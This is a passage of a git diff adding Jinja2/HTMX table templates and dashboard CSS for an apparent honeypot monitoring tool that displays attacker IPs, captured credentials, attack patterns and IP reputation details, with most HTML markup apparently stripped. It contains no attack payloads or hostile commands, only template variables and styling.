+ + + + + + + + + + + + + + {% for ip in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP Address + Total Requests + + First Seen + Last SeenLocation
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ ip.ip | e }} + {{ ip.total_requests }}{{ ip.first_seen | format_ts }}{{ ip.last_seen | format_ts }}{{ ip.city | default('') | e }}{% if ip.city and ip.country_code %}, {% endif %}{{ ip.country_code | default('N/A') | e }} + +
No attackers found
diff --git a/src/templates/jinja2/dashboard/partials/credentials_table.html b/src/templates/jinja2/dashboard/partials/credentials_table.html new file mode 100644 index 0000000..c7ee193 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/credentials_table.html @@ -0,0 +1,66 @@ +{# HTMX fragment: Captured Credentials table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + + + {% for cred in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressUsernamePasswordPath + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ cred.ip | e }} + {{ cred.username | default('N/A') | e }}{{ cred.password | default('N/A') | e }}{{ cred.path | default('') | e }}{{ cred.timestamp | format_ts }} + +
No credentials captured
diff --git a/src/templates/jinja2/dashboard/partials/honeypot_table.html b/src/templates/jinja2/dashboard/partials/honeypot_table.html new file mode 100644 index 0000000..302df69 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/honeypot_table.html @@ -0,0 +1,60 @@ +{# HTMX fragment: Honeypot triggers table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + {% for item in items %} + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP Address + Honeypot Triggers +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ item.ip | e }} + {{ item.count }} + +
No data
diff --git a/src/templates/jinja2/dashboard/partials/ip_detail.html b/src/templates/jinja2/dashboard/partials/ip_detail.html new file mode 100644 index 0000000..8082859 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/ip_detail.html @@ -0,0 +1,131 @@ +{# HTMX fragment: IP detail expansion row content #} +{# Replaces the ~250 line formatIpStats() JavaScript function #} +
+
+ Total Requests: + {{ stats.total_requests | default('N/A') }} +
+
+ First Seen: + {{ stats.first_seen | format_ts }} +
+
+ Last Seen: + {{ stats.last_seen | format_ts }} +
+ {% if stats.city or stats.country_code %} +
+ Location: + {{ stats.city | default('') }}{% if stats.city and stats.country_code %}, {% endif %}{{ stats.country_code | default('') }} +
+ {% endif %} + {% if stats.reverse_dns %} +
+ Reverse DNS: + {{ stats.reverse_dns | e }} +
+ {% endif %} + {% if stats.asn_org %} +
+ ASN Org: + {{ stats.asn_org | e }} +
+ {% endif %} + {% if stats.asn %} +
+ ASN: + {{ stats.asn | e }} +
+ {% endif %} + {% if stats.isp %} +
+ ISP: + {{ stats.isp | e }} +
+ {% endif %} + + {# Flags #} + {% set flags = [] %} + {% if stats.is_proxy %}{% set _ = flags.append('Proxy') %}{% endif %} + {% if stats.is_hosting %}{% set _ = flags.append('Hosting') %}{% endif %} + {% if flags %} +
+ Flags: + {{ flags | join(', ') }} +
+ {% endif %} + + {% if stats.reputation_score is not none %} +
+ Reputation Score: + + {{ stats.reputation_score }}/100 + +
+ {% endif %} + + {% if stats.category %} +
+ Category: + + {{ stats.category | replace('_', ' ') | title }} + +
+ {% endif %} + + {# Timeline + Reputation section #} + {% if stats.category_history or stats.blocklist_memberships %} +
+
+ {# Behavior Timeline #} + {% if stats.category_history %} +
+
Behavior Timeline
+
+ {% for entry in stats.category_history %} +
+
+
+ {{ entry.new_category | default('unknown') | replace('_', ' ') | title }} + {% if entry.old_category %} from {{ entry.old_category | replace('_', ' ') | title }}{% endif %} +
{{ entry.timestamp | format_ts }} +
+
+ {% endfor %} +
+
+ {% endif %} + + {# Reputation / Listed On #} +
+
Reputation
+ {% if stats.blocklist_memberships %} +
Listed On
+ {% for bl in stats.blocklist_memberships %} + {{ bl | e }} + {% endfor %} + {% else %} + Clean - Not listed on any blocklists + {% endif %} +
+
+
+ {% endif %} +
+ +{# Radar chart (right side) #} +{% if stats.category_scores %} +
+
+ +
+
+{% endif %} diff --git a/src/templates/jinja2/dashboard/partials/ip_insight.html b/src/templates/jinja2/dashboard/partials/ip_insight.html new file mode 100644 index 0000000..e7977b7 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/ip_insight.html @@ -0,0 +1,5 @@ +{# HTMX fragment: IP Insight - inline display within dashboard tabs #} +
+ {% set uid = "insight" %} + {% include "dashboard/partials/_ip_detail.html" %} +
diff --git a/src/templates/jinja2/dashboard/partials/map_section.html b/src/templates/jinja2/dashboard/partials/map_section.html new file mode 100644 index 0000000..0112219 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/map_section.html @@ -0,0 +1,38 @@ +{# Map section with filter checkboxes #} +
+

IP Origins Map

+
+ + | + + + + + +
+
+
diff --git a/src/templates/jinja2/dashboard/partials/patterns_table.html b/src/templates/jinja2/dashboard/partials/patterns_table.html new file mode 100644 index 0000000..003f7e3 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/patterns_table.html @@ -0,0 +1,43 @@ +{# HTMX fragment: Attack Patterns table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} patterns +
+ + +
+
+ + + + + + + + + + {% for pattern in items %} + + + + + + {% else %} + + {% endfor %} + +
#Attack PatternOccurrences
{{ loop.index + (pagination.page - 1) * pagination.page_size }} +
+ {{ pattern.pattern | e }} + {% if pattern.pattern | length > 40 %} +
{{ pattern.pattern | e }}
+ {% endif %} +
+
{{ pattern.count }}
No patterns found
diff --git a/src/templates/jinja2/dashboard/partials/raw_request_modal.html b/src/templates/jinja2/dashboard/partials/raw_request_modal.html new file mode 100644 index 0000000..06a46bb --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/raw_request_modal.html @@ -0,0 +1,20 @@ +{# Raw request viewer modal - Alpine.js controlled #} +
+
+
+

Raw HTTP Request

+ × +
+
+

+        
+ +
+
diff --git a/src/templates/jinja2/dashboard/partials/search_results.html b/src/templates/jinja2/dashboard/partials/search_results.html new file mode 100644 index 0000000..1ae0d41 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/search_results.html @@ -0,0 +1,164 @@ +{# HTMX fragment: Search results for attacks and IPs #} +
+ +
+ + Found {{ pagination.total_attacks }} attack{{ 's' if pagination.total_attacks != 1 else '' }} + and {{ pagination.total_ips }} IP{{ 's' if pagination.total_ips != 1 else '' }} + for “{{ query | e }}” + + +
+ + {# ── Matching IPs ─────────────────────────────────── #} + {% if ips %} +
+

Matching IPs

+ + + + + + + + + + + + + + + {% for ip in ips %} + + + + + + + + + + + + + + {% endfor %} + +
#IP AddressRequestsCategoryLocationISP / ASNLast Seen
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ ip.ip | e }} + {{ ip.total_requests }} + {% if ip.category %} + + {{ ip.category | e }} + + {% else %} + unknown + {% endif %} + {{ ip.city | default('') | e }}{% if ip.city and ip.country_code %}, {% endif %}{{ ip.country_code | default('N/A') | e }}{{ ip.isp | default(ip.asn_org | default('N/A')) | e }}{{ ip.last_seen | format_ts }} + +
+
+ {% endif %} + + {# ── Matching Attacks ─────────────────────────────── #} + {% if attacks %} +
+

Matching Attacks

+ + + + + + + + + + + + + + {% for attack in attacks %} + + + + + + + + + + + + + {% endfor %} + +
#IP AddressPathAttack TypesUser-AgentTimeActions
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ attack.ip | e }} + +
+ {{ attack.path | e }} + {% if attack.path | length > 30 %} +
{{ attack.path | e }}
+ {% endif %} +
+
+
+ {% set types_str = attack.attack_types | join(', ') %} + {{ types_str | e }} + {% if types_str | length > 30 %} +
{{ types_str | e }}
+ {% endif %} +
+
{{ (attack.user_agent | default(''))[:50] | e }}{{ attack.timestamp | format_ts }} + {% if attack.log_id %} + + {% endif %} +
+
+ {% endif %} + + {# ── Pagination ───────────────────────────────────── #} + {% if pagination.total_pages > 1 %} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} +
+ + +
+
+ {% endif %} + + {# ── No results ───────────────────────────────────── #} + {% if not attacks and not ips %} +
+ No results found for “{{ query | e }}” +
+ {% endif %} + +
diff --git a/src/templates/jinja2/dashboard/partials/stats_cards.html b/src/templates/jinja2/dashboard/partials/stats_cards.html new file mode 100644 index 0000000..260076c --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/stats_cards.html @@ -0,0 +1,31 @@ +{# Stats cards - server-rendered on initial page load #} +
+
+
{{ stats.total_accesses }}
+
Total Accesses
+
+
+
{{ stats.unique_ips }}
+
Unique IPs
+
+
+
{{ stats.unique_paths }}
+
Unique Paths
+
+
+
{{ stats.suspicious_accesses }}
+
Suspicious Accesses
+
+
+
{{ stats.honeypot_ips | default(0) }}
+
Honeypot Caught
+
+
+
{{ stats.credential_count | default(0) }}
+
Credentials Captured
+
+
+
{{ stats.unique_attackers | default(0) }}
+
Unique Attackers
+
+
diff --git a/src/templates/jinja2/dashboard/partials/suspicious_table.html b/src/templates/jinja2/dashboard/partials/suspicious_table.html new file mode 100644 index 0000000..333e8df --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/suspicious_table.html @@ -0,0 +1,45 @@ +{# Recent Suspicious Activity - server-rendered on page load #} +
+

Recent Suspicious Activity

+ + + + + + + + + + + + {% for activity in suspicious_activities %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
IP AddressPathUser-AgentTime
+ {{ activity.ip | e }} + {{ activity.path | e }}{{ (activity.user_agent | default(''))[:80] | e }}{{ activity.timestamp | format_ts(time_only=True) }} + +
No suspicious activity detected
+
diff --git a/src/templates/jinja2/dashboard/partials/top_ips_table.html b/src/templates/jinja2/dashboard/partials/top_ips_table.html new file mode 100644 index 0000000..d4614c2 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_ips_table.html @@ -0,0 +1,66 @@ +{# HTMX fragment: Top IPs table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + {% for item in items %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressCategory + Access Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ item.ip | e }} + + {% set cat = item.category | default('unknown') %} + {% set cat_colors = {'attacker': '#f85149', 'good_crawler': '#3fb950', 'bad_crawler': '#f0883e', 'regular_user': '#58a6ff', 'unknown': '#8b949e'} %} + + {{ item.count }} + +
No data
diff --git a/src/templates/jinja2/dashboard/partials/top_paths_table.html b/src/templates/jinja2/dashboard/partials/top_paths_table.html new file mode 100644 index 0000000..c102410 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_paths_table.html @@ -0,0 +1,41 @@ +{# HTMX fragment: Top Paths table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + {% for item in items %} + + + + + + {% else %} + + {% endfor %} + +
#Path + Access Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }}{{ item.path | e }}{{ item.count }}
No data
diff --git a/src/templates/jinja2/dashboard/partials/top_ua_table.html b/src/templates/jinja2/dashboard/partials/top_ua_table.html new file mode 100644 index 0000000..2026005 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/top_ua_table.html @@ -0,0 +1,41 @@ +{# HTMX fragment: Top User-Agents table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + {% for item in items %} + + + + + + {% else %} + + {% endfor %} + +
#User-Agent + Count +
{{ loop.index + (pagination.page - 1) * pagination.page_size }}{{ item.user_agent | e }}{{ item.count }}
No data
diff --git a/src/templates/static/css/dashboard.css b/src/templates/static/css/dashboard.css new file mode 100644 index 0000000..5074528 --- /dev/null +++ b/src/templates/static/css/dashboard.css @@ -0,0 +1,1790 @@ +/* Krawl Dashboard Styles */ +/* Extracted from dashboard_template.py */ + +body { + font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; + background-color: #0d1117; + color: #c9d1d9; + margin: 0; + padding: 20px; +} +.container { + max-width: 1400px; + margin: 0 auto; + position: relative; +} +.github-logo { + position: absolute; + top: 0; + left: 0; + display: flex; + align-items: center; + gap: 8px; + text-decoration: none; + color: #58a6ff; + transition: color 0.2s; +} +.github-logo:hover { + color: #79c0ff; +} +.github-logo svg { + width: 32px; + height: 32px; + fill: currentColor; +} +.github-logo-text { + font-size: 14px; + font-weight: 600; + text-decoration: none; +} +h1 { + color: #58a6ff; + text-align: center; + margin-bottom: 40px; + font-weight: 900; + font-family: 'Google Sans Flex', 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; +} +.download-section { + position: absolute; + top: 0; + right: 0; +} +.download-btn { + display: inline-block; + padding: 8px 14px; + background: #238636; + color: #ffffff; + text-decoration: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + transition: background 0.2s; + border: 1px solid #2ea043; +} +.download-btn:hover { + background: #2ea043; +} +.download-btn:active { + background: #1f7a2f; +} +.banlist-dropdown { + position: relative; + display: inline-block; + width: 100%; +} +.banlist-dropdown-btn { + display: block; + width: 100%; + padding: 8px 14px; + background: rgba(35, 134, 54, 0.4); + color: rgba(255, 255, 255, 0.7); + text-decoration: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + transition: background 0.2s, color 0.2s; + border: 1px solid rgba(46, 160, 67, 0.4); + cursor: pointer; + text-align: left; + box-sizing: border-box; +} 
+.banlist-dropdown-btn:hover { /* Hover state: translucent green fill with white text */ + background: rgba(46, 160, 67, 0.6); + color: #ffffff; +} +.banlist-dropdown-menu { /* Dropdown panel: hidden by default; absolutely positioned and pinned to both left: 0 and right: 0 of its containing block */ + display: none; + position: absolute; + right: 0; + left: 0; + background-color: #161b22; + box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.3); + z-index: 1; + border: 1px solid #30363d; + border-radius: 6px; + margin-top: 4px; + overflow: hidden; +} +.banlist-dropdown-menu.show { /* Adding the .show class makes the panel visible */ + display: block; +} +.banlist-dropdown-menu a { /* Menu entries: flex row so content is vertically centered with a 6px gap */ + color: #c9d1d9; + padding: 6px 12px; + text-decoration: none; + display: flex; + align-items: center; + gap: 6px; + transition: background 0.2s; + font-size: 12px; +} +.banlist-dropdown-menu a:hover { + background-color: #1c2128; + color: #58a6ff; +} +.banlist-dropdown-menu a.disabled { /* Disabled entries are greyed out and receive no pointer events */ + color: #6e7681; + cursor: not-allowed; + pointer-events: none; +} +.banlist-icon { + font-size: 14px; +} +.stats-grid { /* Auto-fit grid: as many equal columns as fit, each at least 150px wide */ + display: grid; + grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); + gap: 20px; + margin-bottom: 40px; +} +.stat-card { + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 20px; + text-align: center; +} +.stat-card.alert { /* .alert variant: red border */ + border-color: #f85149; +} +.stat-value { + font-size: 36px; + font-weight: bold; + color: #58a6ff; +} +.stat-value.alert { /* .alert variant: red text instead of blue */ + color: #f85149; +} +.stat-label { + font-size: 14px; + color: #8b949e; + margin-top: 5px; +} +.table-container { /* Bordered panel with 12px padding and 20px bottom margin */ + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 12px; + margin-bottom: 20px; +} +h2 { + color: #58a6ff; + margin-top: 0; +} +table { + width: 100%; + border-collapse: collapse; +} +th, td { /* Cells: 12px padding, left-aligned, bottom rule */ + padding: 12px; + text-align: left; + border-bottom: 1px solid #30363d; +} +th { + background: #0d1117; + color: #58a6ff; + font-weight: 600; +} +tr:hover { + background: #1c2128; +} +.rank { + color: #8b949e; + font-weight: bold; +} +.alert-section { /* Left accent bar: 6px red at 40% alpha */ + background: #161b22; + border-left: 6px solid rgba(248, 81, 73, 0.4); +} +th.sortable { /* Sortable header: the 24px right padding leaves room for the ::after indicator placed at right: 8px */ + cursor: pointer; + user-select: none; + position: relative; + 
padding-right: 24px; +} +th.sortable:hover { + background: #1c2128; +} +th.sortable::after { /* Default indicator: U+21C5 at half opacity */ + content: '\21C5'; + position: absolute; + right: 8px; + opacity: 0.5; + font-size: 12px; +} +th.sortable.asc::after { /* Ascending: U+25B2 (up-pointing triangle), fully opaque */ + content: '\25B2'; + opacity: 1; +} +th.sortable.desc::after { /* Descending: U+25BC (down-pointing triangle), fully opaque */ + content: '\25BC'; + opacity: 1; +} +tbody { /* NOTE(review): this rule and the next both target tbody; they set different properties, so both take effect */ + transition: opacity 0.1s ease; +} +tbody { /* fadeIn keyframes are not defined in the visible part of this diff; presumably declared elsewhere (confirm) */ + animation: fadeIn 0.3s ease-in; +} +.ip-row { + transition: background-color 0.2s; +} +.ip-clickable { /* Link-like IP text: blue with a dotted underline; color is forced with !important */ + cursor: pointer; + color: #58a6ff !important; + font-weight: 500; + text-decoration: underline; + text-decoration-style: dotted; + text-underline-offset: 3px; +} +.ip-clickable:hover { /* Hover: lighter blue, solid underline, subtle background */ + color: #79c0ff !important; + text-decoration-style: solid; + background: #1c2128; +} +.ip-stats-row { + background: #0d1117; +} +.ip-stats-cell { /* Padding zeroed with !important; presumably to override the 12px th, td padding (confirm the element is a table cell) */ + padding: 0 !important; +} +.ip-stats-dropdown { /* Flex row with a 20px gap between children */ + margin-top: 10px; + padding: 15px; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + font-size: 13px; + display: flex; + gap: 20px; +} +.stats-left { /* Takes the remaining width */ + flex: 1; +} +.stats-right { /* Fixed 200px basis (no grow, no shrink); children stacked and centered */ + flex: 0 0 200px; + display: flex; + flex-direction: column; + align-items: center; + justify-content: center; +} +.radar-chart { /* 280px square with overflow visible. NOTE(review): wider than the 200px basis of .stats-right; confirm where this element is nested */ + position: relative; + width: 280px; + height: 280px; + overflow: visible; +} +.radar-legend { + margin-top: 0; + font-size: 11px; + flex-shrink: 0; +} +.radar-legend-item { + display: flex; + align-items: center; + gap: 6px; + margin: 4px 0; +} +.radar-legend-color { + width: 12px; + height: 12px; + border-radius: 2px; +} +.ip-stats-dropdown .loading { + color: #8b949e; + font-style: italic; +} +.stat-row { /* Label/value row: items pushed to opposite ends, thin separator below */ + display: flex; + justify-content: space-between; + padding: 5px 0; + border-bottom: 1px solid #21262d; +} +.stat-row:last-child { /* No separator under the last row */ + border-bottom: none; +} +.stat-label-sm { + color: #8b949e; + font-weight: 500; +} +.stat-value-sm { + color: #58a6ff; + font-weight: 600; +} +.category-badge { /* Shared badge shape; the .category-* rules supply the colors */ + display: inline-block; + padding: 4px 8px; + border-radius: 4px; + font-size: 12px; + 
font-weight: 600; + text-transform: uppercase; +} +.category-attacker { /* Each .category-* rule uses one hue for text and border, and the same hue with 1a alpha (about 10%) for the background */ + background: #f851491a; + color: #f85149; + border: 1px solid #f85149; +} +.category-good-crawler { + background: #3fb9501a; + color: #3fb950; + border: 1px solid #3fb950; +} +.category-bad-crawler { + background: #f0883e1a; + color: #f0883e; + border: 1px solid #f0883e; +} +.category-regular-user { + background: #58a6ff1a; + color: #58a6ff; + border: 1px solid #58a6ff; +} +.category-unknown { + background: #8b949e1a; + color: #8b949e; + border: 1px solid #8b949e; +} +.timeline-section { + margin-top: 15px; + padding-top: 15px; + border-top: 1px solid #30363d; +} +.timeline-container { /* Flex row of columns, at least 200px tall */ + display: flex; + gap: 20px; + min-height: 200px; +} +.timeline-column { /* Scrolls once content exceeds 350px; min-width: 0 allows shrinking below content width */ + flex: 1; + min-width: 0; + overflow: auto; + max-height: 350px; +} +.timeline-column:first-child { /* First column is weighted 1.5 against the last column's 1 */ + flex: 1.5; +} +.timeline-column:last-child { + flex: 1; +} +.timeline-header { + color: #58a6ff; + font-size: 13px; + font-weight: 600; + margin-bottom: 12px; + padding-bottom: 8px; + border-bottom: 1px solid #30363d; +} +.reputation-title { + color: #8b949e; + font-size: 11px; + font-weight: 600; + text-transform: uppercase; + margin-bottom: 8px; +} +.reputation-badge { /* Red tag; the 4d-alpha (about 30%) border turns solid on hover */ + display: inline-flex; + align-items: center; + gap: 3px; + padding: 4px 8px; + background: #161b22; + border: 1px solid #f851494d; + border-radius: 4px; + font-size: 11px; + color: #f85149; + text-decoration: none; + transition: all 0.2s; + margin-bottom: 6px; + margin-right: 6px; + white-space: nowrap; +} +.reputation-badge:hover { + background: #1c2128; + border-color: #f85149; +} +.reputation-clean { /* Green tag using the same padding, radius and font size as .reputation-badge */ + display: inline-flex; + align-items: center; + gap: 3px; + padding: 4px 8px; + background: #161b22; + border: 1px solid #3fb9504d; + border-radius: 4px; + font-size: 11px; + color: #3fb950; + margin-bottom: 6px; +} +.timeline { /* 28px left gutter holds the rail and the markers */ + position: relative; + padding-left: 28px; +} +.timeline::before { /* Rail: 2px wide at left: 11px, spanning the full height */ + content: ''; + position: absolute; + left: 11px; + top: 0; + bottom: 0; + 
width: 2px; + background: #30363d; +} +.timeline-item { + position: relative; + padding-bottom: 12px; + font-size: 12px; +} +.timeline-item:last-child { + padding-bottom: 0; +} +.timeline-marker { /* 14px circle pulled 23px left of its containing block (presumably .timeline-item), i.e. into the gutter */ + position: absolute; + left: -23px; + width: 14px; + height: 14px; + border-radius: 50%; + border: 2px solid #0d1117; +} +.timeline-marker.attacker { /* Marker fills reuse the .category-* hues */ background: #f85149; } +.timeline-marker.good-crawler { background: #3fb950; } +.timeline-marker.bad-crawler { background: #f0883e; } +.timeline-marker.regular-user { background: #58a6ff; } +.timeline-marker.unknown { background: #8b949e; } + +/* ── IP Insight Page Layout ─────────────────────── */ +.ip-insight-content { + animation: fadeIn 0.3s ease-in; +} +.ip-page-header { + margin-bottom: 20px; +} +.ip-page-header h1 { + display: flex; + align-items: center; + gap: 12px; + margin: 0 0 4px 0; +} +.ip-address-title { /* Large monospace IP address */ + font-size: 28px; + font-weight: 700; + color: #e6edf3; + font-family: monospace; +} +.ip-location-subtitle { + color: #8b949e; + font-size: 14px; + margin: 4px 0 0 0; +} + +/* Quick stats bar */ +.ip-stats-bar { + display: flex; + gap: 12px; + margin-bottom: 20px; + flex-wrap: wrap; +} +.ip-stat-chip { /* flex: 1 1 0 gives all chips equal width; min-width: 0 lets them shrink below content width */ + background: #161b22; + border: 1px solid #30363d; + border-radius: 8px; + padding: 12px 20px; + display: flex; + flex-direction: column; + gap: 2px; + min-width: 0; + flex: 1 1 0; +} +.ip-stat-chip-value { /* Kept on one line; overflow is cut with an ellipsis */ + color: #e6edf3; + font-size: 16px; + font-weight: 700; + white-space: nowrap; + overflow: hidden; + text-overflow: ellipsis; +} +.ip-stat-chip-label { + color: #8b949e; + font-size: 11px; + text-transform: uppercase; + letter-spacing: 0.5px; + font-weight: 500; +} + +/* Two-column grid */ +.ip-page-grid { /* Two equal columns; align-items: stretch makes both columns the same height */ + display: grid; + grid-template-columns: 1fr 1fr; + gap: 20px; + align-items: stretch; +} +.ip-page-left, +.ip-page-right { /* Each column stacks its cards vertically with a 20px gap */ + display: flex; + flex-direction: column; + gap: 20px; + min-height: 0; +} +/* Left card fills column height */ +.ip-info-card { + flex: 1; + display: flex; + flex-direction: 
column; +} +/* Timeline card grows to fill remaining space */ +.ip-timeline-card { + flex: 1; + display: flex; + flex-direction: column; + min-height: 0; +} + +/* Detail cards */ +.ip-detail-card h2 { + margin-top: 0; + margin-bottom: 16px; +} +/* Remove bottom margin inside grid columns (gap handles spacing) */ +.ip-page-left .table-container, +.ip-page-right .table-container { + margin-bottom: 0; +} + +/* Definition list for IP info */ +.ip-dl { + margin: 0; + display: flex; + flex-direction: column; + gap: 0; +} +.ip-dl-row { /* One term/value pair per row, pushed to opposite ends and baseline-aligned */ + display: flex; + justify-content: space-between; + align-items: baseline; + padding: 8px 0; + border-bottom: 1px solid #21262d; + gap: 16px; +} +.ip-dl-row:last-child { + border-bottom: none; +} +.ip-dl dt { /* Term: minimum width of 100px, never shrinks */ + color: #8b949e; + font-size: 13px; + font-weight: 500; + flex-shrink: 0; + min-width: 100px; +} +.ip-dl dd { /* Value: right-aligned; long words may break */ + margin: 0; + color: #e6edf3; + font-size: 13px; + font-weight: 500; + text-align: right; + word-break: break-word; +} +.ip-dl-mono { + font-family: monospace; + font-size: 12px; +} + +/* Section headings inside IP info card */ +.ip-section-heading { + color: #e6edf3; + font-size: 15px; + font-weight: 700; + margin: 18px 0 8px 0; + padding: 0; +} +.ip-section-heading:first-of-type { /* The first heading has no top margin */ + margin-top: 0; +} +/* Highlighted date values */ +.ip-dl-highlight { + color: #58a6ff; +} + +/* Scrollable reputation container */ +.ip-rep-scroll { /* scrollbar-width and scrollbar-color are the standard properties; the ::-webkit-scrollbar rules below style the same bar in WebKit-based browsers */ + max-height: 200px; + overflow-y: auto; + scrollbar-width: thin; + scrollbar-color: #30363d #161b22; +} +.ip-rep-scroll::-webkit-scrollbar { + width: 6px; +} +.ip-rep-scroll::-webkit-scrollbar-track { + background: #161b22; + border-radius: 3px; +} +.ip-rep-scroll::-webkit-scrollbar-thumb { + background: #30363d; + border-radius: 3px; +} +.ip-rep-scroll::-webkit-scrollbar-thumb:hover { + background: #484f58; +} + +/* Scrollable behavior timeline – show ~5 entries max */ +.ip-timeline-scroll { /* Same scrollbar treatment as .ip-rep-scroll, with a 230px height cap */ + max-height: 230px; + overflow-y: auto; + min-height: 0; + scrollbar-width: thin; + scrollbar-color: 
#30363d #161b22; +} +.ip-timeline-scroll::-webkit-scrollbar { + width: 6px; +} +.ip-timeline-scroll::-webkit-scrollbar-track { + background: #161b22; + border-radius: 3px; +} +.ip-timeline-scroll::-webkit-scrollbar-thumb { + background: #30363d; + border-radius: 3px; +} +.ip-timeline-scroll::-webkit-scrollbar-thumb:hover { + background: #484f58; +} + +/* Reputation section */ +.ip-rep-row { /* Label and tags side by side, top-aligned */ + padding: 10px 0; + border-bottom: 1px solid #21262d; + display: flex; + align-items: flex-start; + gap: 16px; +} +.ip-rep-row:last-child { + border-bottom: none; +} +.ip-rep-label { + color: #8b949e; + font-size: 13px; + font-weight: 500; + flex-shrink: 0; + min-width: 80px; + padding-top: 2px; +} +.ip-rep-tags { + display: flex; + flex-wrap: wrap; + gap: 6px; +} + +/* Flags & badges */ +.ip-flag { /* Orange tag with a 4d-alpha (about 30%) border */ + display: inline-block; + background: #1c2128; + border: 1px solid #f0883e4d; + border-radius: 4px; + padding: 3px 10px; + font-size: 12px; + color: #f0883e; + font-weight: 500; +} +.reputation-score { + font-weight: 700; +} +.reputation-score.bad { /* Score colors: bad is red, medium is orange, good is green */ color: #f85149; } +.reputation-score.medium { color: #f0883e; } +.reputation-score.good { color: #3fb950; } +.blocklist-badges { + display: flex; + flex-wrap: wrap; + gap: 6px; +} + +/* Bottom row: Timeline + Attack Types side by side */ +.ip-bottom-row { + display: flex; + gap: 20px; + flex: 1; + min-height: 0; +} +.ip-bottom-row .ip-timeline-card { /* Inside the bottom row both cards use flex: 1, so they share the width equally */ + flex: 1; + min-width: 0; +} +.ip-attack-types-card { + flex: 1; + display: flex; + flex-direction: column; + min-width: 0; +} +.ip-attack-chart-wrapper { /* Grows to fill the card; never shorter than 180px */ + flex: 1; + position: relative; + min-height: 180px; +} + +/* Radar chart */ +.radar-chart-container { + display: flex; + align-items: center; + justify-content: center; + padding: 10px 0; +} + +/* ── Behavior Timeline (full-width horizontal) ──── */ +.ip-timeline-hz { /* Entries are stacked in a column; the 24px left gutter holds the rail and dots */ + display: flex; + flex-direction: column; + gap: 0; + position: relative; + padding-left: 24px; +} +.ip-timeline-hz::before { /* Rail: 2px wide at left: 7px, inset 8px from top and bottom */ + content: ''; + position: absolute; + 
left: 7px; + top: 8px; + bottom: 8px; + width: 2px; + background: #30363d; +} +.ip-tl-entry { + display: flex; + align-items: flex-start; + gap: 14px; + position: relative; + padding: 10px 0; +} +.ip-tl-entry:not(:last-child) { /* Separator under every entry except the last */ + border-bottom: 1px solid #161b22; +} +.ip-tl-dot { /* Absolutely positioned 24px left of its containing block (presumably .ip-tl-entry), into the gutter. NOTE(review): flex-shrink has no effect on an absolutely positioned box */ + width: 14px; + height: 14px; + border-radius: 50%; + flex-shrink: 0; + border: 2px solid #0d1117; + position: absolute; + left: -24px; + top: 12px; + z-index: 1; +} +.ip-tl-dot.attacker { /* Category dots add a glow in the same hue at 80 alpha (about 50%); .unknown has no glow */ background: #f85149; box-shadow: 0 0 6px #f8514980; } +.ip-tl-dot.good-crawler { background: #3fb950; box-shadow: 0 0 6px #3fb95080; } +.ip-tl-dot.bad-crawler { background: #f0883e; box-shadow: 0 0 6px #f0883e80; } +.ip-tl-dot.regular-user { background: #58a6ff; box-shadow: 0 0 6px #58a6ff80; } +.ip-tl-dot.unknown { background: #8b949e; } +.ip-tl-content { /* Baseline-aligned row that wraps when space runs out */ + display: flex; + align-items: baseline; + gap: 10px; + flex-wrap: wrap; + min-width: 0; +} +.ip-tl-cat { + color: #e6edf3; + font-weight: 600; + font-size: 14px; +} +.ip-tl-from { + color: #8b949e; + font-size: 13px; +} +.ip-tl-time { /* margin-left: auto pushes the timestamp to the far end of its flex row */ + color: #484f58; + font-size: 12px; + margin-left: auto; + white-space: nowrap; +} + +/* Legacy compat (unused) */ /* NOTE(review): no rules follow this heading in the visible diff; it may be stale */ + +@media (max-width: 900px) { /* Up to 900px wide: single-column grid; stats bar, bottom row and timeline content stack vertically */ + .ip-page-grid { + grid-template-columns: 1fr; + } + .ip-stats-bar { + flex-direction: column; + } + .ip-stat-chip { + flex: 1 1 auto; + } + .ip-bottom-row { + flex-direction: column; + } + .ip-tl-content { + flex-direction: column; + gap: 2px; + } + .ip-tl-time { + margin-left: 0; + } +} + 